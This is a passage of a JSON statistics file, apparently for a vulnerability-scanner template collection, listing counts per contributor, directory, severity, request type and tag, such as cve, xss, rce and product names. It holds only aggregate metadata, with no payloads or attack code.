(@tech)","count":7},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"r3dg33k","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"melbadry9","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"that_juan_","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"yanyun","count":5},{"name":"caspergn","count":5},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"rootxharsh","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"z3bd","count":3},{"name":"f1tz","count":3},{"name":"kophjager007","count":3},{"name":"0w4ys","count":3},{"name":"joanbono","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"jarijaas","count":2},{"name":"0xprial","count":2},{"name":"vavkamil","count":2},{"name":"swissky","count":2},{"name":"incogbyte","count":2},{"name":"foulenzer","count":2},{"name":"unstabl3","count":2},{"name":"manas_harsh","count":2},{"name":"mavericknerd","count":2},{"name":"0xelkomy","count":2},{"name":"shifacyclewala","count":2},{"name":"pxmme1337","count":2},{"name":"joeldeleep","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"0xcrypto","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"x1m_martijn","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"emenalf","count":2},{"name":"gevakun","count":2},{"name":"bp0lr","count":2},{"name":"elsfa7110","count":2},{"name":"moritz nentwig","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"udit_thakkur","count":2},{"name":"bsysop","count":2},{"name":"davidmckennirey","count":2},{"name":"dheerajmadhukar","count":2},{"name":"ehsahil","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"randomrobbie","count":2},{"name":"streetofhackerr007","count":1},{"name":"yashgoti","count":1},{"name":"patralos","count":1},{"name":"dawid czarnecki","count":1},{"name":"regala_","count":1},{"name":"mhdsamx","count":1},{"name":"@dwisiswant0","count":1},{"name":"noamrathaus","count":1},{"name":"becivells","count":1},{"name":"bolli95","count":1},{"name":"yavolo","count":1},{"name":"tim_koopmans","count":1},{"name":"wabafet","count":1},{"name":"d0rkerdevil","count":1},{"name":"exploitation","count":1},{"name":"_harleo","count":1},{"name":"0xrod","count":1},{"name":"zhenwarx","count":1},{"name":"bjhulst","count":1},{"name":"hanlaomo","count":1},{"name":"sullo","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"shreyapohekar","count":1},{"name":"co0nan","count":1},{"name":"abison_binoy","count":1},{"name":"remonsec","count":1},{"name":"raesene","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"c3l3si4n","count":1},{"name":"hakluke","count":1},{"name":"willd96","count":1},{"name":"th3.d1p4k","count":1},{"name":"luci","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"alifathi-h1","count":1},{"name":"fopina","count":1},{"name":"defr0ggy","count":1},{"name":"dudez","count":1},{"name":"qlkwej","count":1},{"name":"nkxxkn","count":1},{"name":"akash.c","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"soyelmago","count":1},{"name":"0xtavian","count":1},{"name":"thevillagehacker","count":1},{"name":"vsh00t","count":1},{"name":"rtcms","count":1},{"name":"zandros0","count":1},{"name":"_c0wb0y_","count":1},{"name":"0h1in9e","count":1},{"name":"juicypotato1","count":1},{"name":"smaranchand","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ringo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"apt-mirror","count":1},{"name":"kareemse1im","count":1},{"name":"vzamanillo","count":1},{"name":"andirrahmani1","count":1},{"name":"b4uh0lz","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"yashanand155","count":1},{"name":"micha3lb3n","count":1},{"name":"alex","count":1},{"name":"ohlinge","count":1},{"name":"iampritam","count":1},{"name":"_darrenmartyn","count":1},{"name":"alperenkesk","count":1},{"name":"taielab","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"ldionmarcil","count":1},{"name":"sickwell","count":1},{"name":"idealphase","count":1},{"name":"shelld3v","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"johnk3r","count":1},{"name":"luskabol","count":1},{"name":"mubassirpatel","count":1},{"name":"_generic_human_","count":1},{"name":"ajaysenr","count":1},{"name":"whynotke","count":1},{"name":"mohammedsaneem","count":1},{"name":"alph4byt3","count":1},{"name":"knassar702","count":1},{"name":"affix","count":1},{"name":"arcc","count":1},{"name":"notsoevilweasel","count":1},{"name":"undefl0w","count":1},{"name":"j33n1k4","count":1},{"name":"blckraven","count":1},{"name":"flag007","count":1},{"name":"0ut0fb4nd","count":1},{"name":"koti2","count":1},{"name":"jeya seelan","count":1},{"name":"cookiehanhoan","count":1},{"name":"omarkurt","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"furkansenan","count":1},{"name":"manuelbua","count":1},{"name":"schniggie","count":1},{"name":"ilovebinbash","count":1},{"name":"johnjhacking","count":1},{"name":"kabirsuda","count":1},{"name":"sshell","count":1},{"name":"pudsec","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"divya_mudgal","count":1},{"name":"ooooooo_q","count":1},{"name":"bing0o","count":1},{"name":"akshansh","count":1},{"name":"kurohost","count":1},{"name":"daviey","count":1},{"name":"absshax","count":1},{"name":"rojanrijal","count":1},{"name":"ipanda","count":1},{"name":"sy3omda","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"52971","count":1},{"name":"dogasantos","count":1},{"name":"deena","count":1},{"name":"fmunozs","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"thezakman","count":1},{"name":"r3naissance","count":1},{"name":"pdp","count":1},{"name":"chron0x","count":1},{"name":"toufik airane","count":1},{"name":"w4cky_","count":1},{"name":"sicksec","count":1},{"name":"its0x08","count":1},{"name":"gal nagli","count":1},{"name":"naglinagli","count":1},{"name":"tirtha_mandal","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"fabaff","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":233},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":187},{"name":"low","count":150}],"types":[{"name":"http","count":1409},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"misconfig","count":13},{"name":"android","count":12},{"name":"adobe","count":12},{"name":"auth-bypass","count":12},{"name":"weblogic","count":12},{"name":"zoho","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"springboot","count":11},{"name":"cve2012","count":11},{"name":"cve2013","count":10},{"name":"dlink","count":10},{"name":"php","count":10},{"name":"devops","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"magento","count":9},{"name":"aws","count":8},{"name":"router","count":8},{"name":"cnvd","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"ftp","count":8},{"name":"vmware","count":7},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"xxe","count":7},{"name":"nginx","count":7},{"name":"google","count":6},{"name":"citrix","count":6},{"name":"backup","count":6},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"coldfusion","count":6},{"name":"headless","count":5},{"name":"django","count":5},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"netgear","count":5},{"name":"ssti","count":5},{"name":"phpmyadmin","count":5},{"name":"circarlife","count":5},{"name":"ibm","count":5},{"name":"confluence","count":5},{"name":"lucee","count":5},{"name":"dedecms","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"solr","count":5},{"name":"ruijie","count":5},{"name":"java","count":5},{"name":"dell","count":5},{"name":"cve2009","count":5},{"name":"login","count":5},{"name":"moodle","count":4},{"name":"tomcat","count":4},{"name":"nodejs","count":4},{"name":"elastic","count":4},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"artifactory","count":4},{"name":"docker","count":4},{"name":"hongdian","count":4},{"name":"samsung","count":4},{"name":"crlf","count":4},{"name":"magmi","count":4},{"name":"jolokia","count":4},{"name":"asp","count":4},{"name":"vpn","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"fpd","count":3},{"name":"windows","count":3},{"name":"caucho","count":3},{"name":"amazon","count":3},{"name":"grafana","count":3},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"printer","count":3},{"name":"deserialization","count":3},{"name":"nacos","count":3},{"name":"ssh","count":3},{"name":"vbulletin","count":3},{"name":"log","count":3},{"name":"mongodb","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"openssh","count":3},{"name":"r-seenet","count":3},{"name":"microstrategy","count":3},{"name":"kafka","count":3},{"name":"kubernetes","count":3},{"name":"bypass","count":3},{"name":"git","count":3},{"name":"terramaster","count":3},{"name":"springcloud","count":3},{"name":"ofbiz","count":3},{"name":"ebs","count":3},{"name":"lfr","count":3},{"name":"resin","count":3},{"name":"backups","count":3},{"name":"hp","count":3},{"name":"voipmonitor","count":2},{"name":"nagios","count":2},{"name":"ecology","count":2},{"name":"leak","count":2},{"name":"sonarqube","count":2},{"name":"cve2008","count":2},{"name":"jellyfin","count":2},{"name":"splunk","count":2},{"name":"dos","count":2},{"name":"zhiyuan","count":2},{"name":"igs","count":2},{"name":"spark","count":2},{"name":"hpe","count":2},{"name":"saltstack","count":2},{"name":"icewarp","count":2},{"name":"kevinlab","count":2},{"name":"flir","count":2},{"name":"smb","count":2},{"name":"xxljob","count":2},{"name":"odoo","count":2},{"name":"fortios","count":2},{"name":"activemq","count":2},{"name":"prometheus","count":2},{"name":"telerik","count":2},{"name":"maian","count":2},{"name":"httpd","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"hjtcloud","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"cve2007","count":2},{"name":"kentico","count":2},{"name":"natshell","count":2},{"name":"openfire","count":2},{"name":"chiyu","count":2},{"name":"vrealize","count":2},{"name":"linkerd","count":2},{"name":"globalprotect","count":2},{"name":"nextjs","count":2},{"name":"intrusive","count":2},{"name":"pega","count":2},{"name":"yapi","count":2},{"name":"huawei","count":2},{"name":"mida","count":2},{"name":"hashicorp","count":2},{"name":"jboss","count":2},{"name":"injection","count":2},{"name":"waf","count":2},{"name":"frp","count":2},{"name":"proxy","count":2},{"name":"rstudio","count":2},{"name":"webcam","count":2},{"name":"chamilo","count":2},{"name":"oauth","count":2},{"name":"paloalto","count":2},{"name":"shellshock","count":2},{"name":"showdoc","count":2},{"name":"sonicwall","count":2},{"name":"nexus","count":2},{"name":"couchdb","count":2},{"name":"bigip","count":2},{"name":"cache","count":2},{"name":"seeyon","count":2},{"name":"service","count":2},{"name":"bitrix","count":2},{"name":"wordfence","count":2},{"name":"kibana","count":2},{"name":"openam","count":2},{"name":"keycloak","count":2},{"name":"mail","count":2},{"name":"rockethchat","count":2},{"name":"smtp","count":2},{"name":"sharepoint","count":2},{"name":"idrac","count":2},{"name":"rockmongo","count":2},{"name":"emerge","count":2},{"name":"strapi","count":2},{"name":"plesk","count":2},{"name":"zabbix","count":2},{"name":"opencast","count":1},{"name":"chevereto","count":1},{"name":"discord","count":1},{"name":"exchange","count":1},{"name":"csod","count":1},{"name":"cse","count":1},{"name":"ambari","count":1},{"name":"plugin","count":1},{"name":"enumeration","count":1},{"name":"redwood","count":1},{"name":"mariadb","count":1},{"name":"jenkin","count":1},{"name":"starttls","count":1},{"name":"visualtools","count":1},{"name":"aspnuke","count":1},{"name":"mobileiron","count":1},{"name":"fastapi","count":1},{"name":"druid","count":1},{"name":"bitly","count":1},{"name":"salesforce","count":1},{"name":"tamronos","count":1},{"name":"74cms","count":1},{"name":"cors","count":1},{"name":"circontrol","count":1},{"name":"grav","count":1},{"name":"drone","count":1},{"name":"yii","count":1},{"name":"solman","count":1},{"name":"pgadmin","count":1},{"name":"avalanche","count":1},{"name":"diris","count":1},{"name":"faraday","count":1},{"name":"fortigate","count":1},{"name":"vnc","count":1},{"name":"phpinfo","count":1},{"name":"rubedo","count":1},{"name":"turbocrm","count":1},{"name":"szhe","count":1},{"name":"floc","count":1},{"name":"primetek","count":1},{"name":"backdoor","count":1},{"name":"phpunit","count":1},{"name":"sangfor","count":1},{"name":"2014","count":1},{"name":"acme","count":1},{"name":"viewpoint","count":1},{"name":"subrion","count":1},{"name":"symfony","count":1},{"name":"fortiweb","count":1},{"name":"emby","count":1},{"name":"tika","count":1},{"name":"fastcgi","count":1},{"name":"triconsole","count":1},{"name":"opensmtpd","count":1},{"name":"tapestry","count":1},{"name":"sarg","count":1},{"name":"upnp","count":1},{"name":"chinaunicom","count":1},{"name":"oscommerce","count":1},{"name":"seacms","count":1},{"name":"krweb","count":1},{"name":"rdp","count":1},{"name":"discourse","count":1},{"name":"openstack","count":1},{"name":"akamai","count":1},{"name":"alibaba","count":1},{"name":"mediumish","count":1},{"name":"eyou","count":1},{"name":"jitsi","count":1},{"name":"clusterengine","count":1},{"name":"ec2","count":1},{"name":"email","count":1},{"name":"b2evolution","count":1},{"name":"wazuh","count":1},{"name":"netis","count":1},{"name":"mongoshake","count":1},{"name":"thinkadmin","count":1},{"name":"mara","count":1},{"name":"mautic","count":1},{"name":"netrc","count":1},{"name":"phalcon","count":1},{"name":"panabit","count":1},{"name":"k8","count":1},{"name":"dotnet","count":1},{"name":"lotuscms","count":1},{"name":"redhat","count":1},{"name":"jquery","count":1},{"name":"nc2","count":1},{"name":"nedi","count":1},{"name":"proftpd","count":1},{"name":"myucms","count":1},{"name":"shopware","count":1},{"name":"moin","count":1},{"name":"blue-ocean","count":1},{"name":"fortinet","count":1},{"name":"wildfly","count":1},{"name":"ns","count":1},{"name":"nexusdb","count":1},{"name":"pacsone","count":1},{"name":"skywalking","count":1},{"name":"crm","count":1},{"name":"ruby","count":1},{"name":"mirai","count":1},{"name":"sprintful","count":1},{"name":"ilo4","count":1},{"name":"mongo","count":1},{"name":"zarafa","count":1},{"name":"synnefo","count":1},{"name":"goahead","count":1},{"name":"kubeflow","count":1},{"name":"expose","count":1},{"name":"visionhub","count":1},{"name":"gateone","count":1},{"name":"enum","count":1},{"name":"doh","count":1},{"name":"portainer","count":1},{"name":"mpsec","count":1},{"name":"lansweeper","count":1},{"name":"nuuo","count":1},{"name":"octoprint","count":1},{"name":"itop","count":1},{"name":"gitlist","count":1},{"name":"circontrorl","count":1},{"name":"ueditor","count":1},{"name":"rmc","count":1},{"name":"duomicms","count":1},{"name":"wso2","count":1},{"name":"fuelcms","count":1},{"name":"redcap","count":1},{"name":"zookeeper","count":1},{"name":"apiman","count":1},{"name":"tpshop","count":1},{"name":"klog","count":1},{"name":"codeigniter","count":1},{"name":"npm","count":1},{"name":"jfrog","count":1},{"name":"mcafee","count":1},{"name":"accela","count":1},{"name":"saltapi","count":1},{"name":"alerta","count":1},{"name":"axis","count":1},{"name":"memcached","count":1},{"name":"sqlite","count":1},{"name":"ssltls","count":1},{"name":"codemeter","count":1},{"name":"lancom","count":1},{"name":"varnish","count":1},{"name":"zimbra","count":1},{"name":"linksys","count":1},{"name":"vsftpd","count":1},{"name":"jeewms","count":1},{"name":"kafdrop","count":1},{"name":"bookstack","count":1},{"name":"swagger","count":1},{"name":"robomongo","count":1},{"name":"flash","count":1},{"name":"jmx","count":1},{"name":"wooyun","count":1},{"name":"nomad","count":1},{"name":"timeclock","count":1},{"name":"nuxeo","count":1},{"name":"lanproxy","count":1},{"name":"vsphere","count":1},{"name":"tensorflow","count":1},{"name":"status","count":1},{"name":"geddy","count":1},{"name":"xml","count":1},{"name":"biometrics","count":1},{"name":"weiphp","count":1},{"name":"labtech","count":1},{"name":"jsp","count":1},{"name":"haproxy","count":1},{"name":"springframework","count":1},{"name":"kyan","count":1},{"name":"pulsesecure","count":1},{"name":"zzzcms","count":1},{"name":"plc","count":1},{"name":"openrestry","count":1},{"name":"ganglia","count":1},{"name":"xiuno","count":1},{"name":"glances","count":1},{"name":"huijietong","count":1},{"name":"concrete","count":1},{"name":"spring","count":1},{"name":"firebase","count":1},{"name":"embedthis","count":1},{"name":"expn","count":1},{"name":"jenzabar","count":1},{"name":"zenario","count":1},{"name":"xdcms","count":1},{"name":"etouch","count":1},{"name":"clockwatch","count":1},{"name":"db","count":1},{"name":"trilithic","count":1},{"name":"horde","count":1},{"name":"bedita","count":1},{"name":"aura","count":1},{"name":"tileserver","count":1},{"name":"keenetic","count":1},{"name":"geutebruck","count":1},{"name":"kong","count":1},{"name":"rhymix","count":1},{"name":"emc","count":1},{"name":"servicenow","count":1},{"name":"clave","count":1},{"name":"tenda","count":1},{"name":"opentsdb","count":1},{"name":"lutron","count":1},{"name":"payara","count":1},{"name":"hadoop","count":1},{"name":"viewlinc","count":1},{"name":"bash","count":1},{"name":"arl","count":1},{"name":"scs","count":1},{"name":"checkpoint","count":1},{"name":"traefik","count":1},{"name":"zm","count":1},{"name":"landrayoa","count":1},{"name":"zte","count":1},{"name":"zeroshell","count":1},{"name":"csrf","count":1},{"name":"sidekiq","count":1},{"name":"yachtcontrol","count":1},{"name":"metinfo","count":1},{"name":"appweb","count":1},{"name":"wiki","count":1},{"name":"smartsense","count":1},{"name":"netdata","count":1},{"name":"expressjs","count":1},{"name":"woocomernce","count":1},{"name":"feifeicms","count":1},{"name":"parentlink","count":1},{"name":"landray","count":1},{"name":"setup","count":1},{"name":"blind","count":1},{"name":"liferay","count":1},{"name":"wavemaker","count":1},{"name":"wp-theme","count":1},{"name":"dlogin","count":1},{"name":"jnoj","count":1},{"name":"totaljs","count":1},{"name":"sceditor","count":1},{"name":"nps","count":1},{"name":"addpac","count":1},{"name":"redis","count":1},{"name":"zcms","count":1},{"name":"commscope","count":1},{"name":"alertmanager","count":1},{"name":"avtech","count":1},{"name":"grails","count":1},{"name":"ecom","count":1},{"name":"webmin","count":1},{"name":"bolt","count":1},{"name":"sentry","count":1},{"name":"zend","count":1},{"name":"ricoh","count":1},{"name":"dvr","count":1},{"name":"shopxo","count":1},{"name":"gridx","count":1},{"name":"anchorcms","count":1},{"name":"stem","count":1},{"name":"panos","count":1},{"name":"extractor","count":1},{"name":"wuzhicms","count":1},{"name":"cacti","count":1},{"name":"episerver","count":1},{"name":"heroku","count":1},{"name":"timesheet","count":1},{"name":"mailchimp","count":1},{"name":"iptime","count":1},{"name":"netsweeper","count":1},{"name":"moinmoin","count":1},{"name":"javafaces","count":1},{"name":"beanshell","count":1},{"name":"optiLink","count":1},{"name":"gloo","count":1},{"name":"h3c-imc","count":1},{"name":"mantis","count":1},{"name":"sitecore","count":1},{"name":"postgres","count":1},{"name":"centos","count":1},{"name":"rujjie","count":1},{"name":"cloudinary","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"spidercontrol","count":1},{"name":"dvwa","count":1},{"name":"opensns","count":1},{"name":"monitorr","count":1},{"name":"mantisbt","count":1},{"name":"wamp","count":1},{"name":"tensorboard","count":1},{"name":"apos","count":1},{"name":"webadmin","count":1},{"name":"wmt","count":1},{"name":"comodo","count":1},{"name":"manageengine","count":1},{"name":"jsf","count":1},{"name":"dom","count":1},{"name":"hortonworks","count":1},{"name":"rabbitmq","count":1},{"name":"svn","count":1},{"name":"esmtp","count":1},{"name":"idemia","count":1},{"name":"glpi","count":1},{"name":"favicon","count":1},{"name":"majordomo2","count":1},{"name":"node-red-dashboard","count":1},{"name":"realteo","count":1},{"name":"ntopng","count":1},{"name":"hasura","count":1},{"name":"selea","count":1},{"name":"lighttpd","count":1},{"name":"upload","count":1},{"name":"cgi","count":1},{"name":"fiori","count":1},{"name":"nordex","count":1},{"name":"javascript","count":1},{"name":"sco","count":1},{"name":"postmessage","count":1},{"name":"fortilogger","count":1},{"name":"xunchi","count":1},{"name":"soar","count":1},{"name":"monitorix","count":1},{"name":"magicflow","count":1},{"name":"darkstat","count":1},{"name":"openerp","count":1},{"name":"uwsgi","count":1},{"name":"powercreator","count":1},{"name":"blackboard","count":1},{"name":"webui","count":1},{"name":"pyramid","count":1},{"name":"ssl","count":1},{"name":"javamelody","count":1},{"name":"exacqvision","count":1},{"name":"ulterius","count":1},{"name":"empirecms","count":1},{"name":"harbor","count":1},{"name":"finereport","count":1},{"name":"svnserve","count":1},{"name":"rsyncd","count":1},{"name":"ems","count":1},{"name":"gogs","count":1},{"name":"dotnetnuke","count":1},{"name":"linkedin","count":1},{"name":"phpfusion","count":1},{"name":"octobercms","count":1},{"name":"mdb","count":1},{"name":"pippoint","count":1},{"name":"vscode","count":1},{"name":"spf","count":1},{"name":"wavlink","count":1},{"name":"webmodule-ee","count":1},{"name":"calendarix","count":1},{"name":"tongda","count":1},{"name":"rfi","count":1},{"name":"plone","count":1},{"name":"azure","count":1},{"name":" default-login","count":1},{"name":"nsasg","count":1},{"name":"pagespeed","count":1},{"name":"maccmsv10","count":1},{"name":"webftp","count":1},{"name":"dotclear","count":1},{"name":"scimono","count":1},{"name":"hiboss","count":1},{"name":"cve2005","count":1},{"name":"acexy","count":1},{"name":"rmi","count":1},{"name":"bruteforce","count":1},{"name":"ruckus","count":1},{"name":"livezilla","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"socomec","count":1},{"name":"opm","count":1},{"name":"cobub","count":1},{"name":"spectracom","count":1},{"name":"zmanda","count":1},{"name":"razor","count":1},{"name":"erp-nc","count":1},{"name":"interlib","count":1},{"name":"xmlchart","count":1},{"name":"flink","count":1},{"name":"xff","count":1},{"name":"adminer","count":1},{"name":"bullwark","count":1},{"name":"kerbynet","count":1},{"name":"cocoon","count":1},{"name":"plastic","count":1},{"name":"cloudflare","count":1},{"name":"domxss","count":1},{"name":"fortigates","count":1},{"name":"wifisky","count":1},{"name":"eprints","count":1},{"name":"dompdf","count":1},{"name":"nette","count":1},{"name":"k8s","count":1},{"name":"ioncube","count":1},{"name":"node","count":1},{"name":"servicedesk","count":1},{"name":"fedora","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"melbadry9","count":8},{"name":"that_juan_","count":8},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"fyoorer","count":3},{"name":"_generic_human_","count":3},{"name":"jarijaas","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"mavericknerd","count":3},{"name":"binaryfigments","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"joeldeleep","count":2},{"name":"randomrobbie","count":2},{"name":"random-robbie","count":2},{"name":"fabaff","count":2},{"name":"unstabl3","count":2},{"name":"ehsahil","count":2},{"name":"shifacyclewala","count":2},{"name":"davidmckennirey","count":2},{"name":"0xsapra","count":2},{"name":"emenalf","count":2},{"name":"bp0lr","count":2},{"name":"nkxxkn","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"ree4pwn","count":2},{"name":"w4cky_","count":2},{"name":"lu4nx","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"afaq","count":2},{"name":"gevakun","count":2},{"name":"kiblyn11","count":2},{"name":"0xelkomy","count":2},{"name":"bing0o","count":2},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"udit_thakkur","count":2},{"name":"zomsop82","count":2},{"name":"incogbyte","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xprial","count":2},{"name":"moritz nentwig","count":2},{"name":"swissky","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"foulenzer","count":2},{"name":"amsda","count":2},{"name":"0xcrypto","count":2},{"name":"manuelbua","count":1},{"name":"knassar702","count":1},{"name":"hakluke","count":1},{"name":"mah3sec_","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dogasantos","count":1},{"name":"its0x08","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"naglinagli","count":1},{"name":"wabafet","count":1},{"name":"bernardofsr","count":1},{"name":"daviey","count":1},{"name":"bad5ect0r","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"luci","count":1},{"name":"zhenwarx","count":1},{"name":"kabirsuda","count":1},{"name":"vsh00t","count":1},{"name":"kareemse1im","count":1},{"name":"idealphase","count":1},{"name":"0xrod","count":1},{"name":"ahmed sherif","count":1},{"name":"johnjhacking","count":1},{"name":"alex","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"furkansenan","count":1},{"name":"undefl0w","count":1},{"name":"regala_","count":1},{"name":"yavolo","count":1},{"name":"ipanda","count":1},{"name":"qlkwej","count":1},{"name":"dawid czarnecki","count":1},{"name":"elmahdi","count":1},{"name":"rojanrijal","count":1},{"name":"pdp","count":1},{"name":"exploitation","count":1},{"name":"bolli95","count":1},{"name":"affix","count":1},{"name":"sullo","count":1},{"name":"fopina","count":1},{"name":"vzamanillo","count":1},{"name":"ringo","count":1},{"name":"berkdusunur","count":1},{"name":"ldionmarcil","count":1},{"name":"ajaysenr","count":1},{"name":"sid ahmed malaoui @ realistic 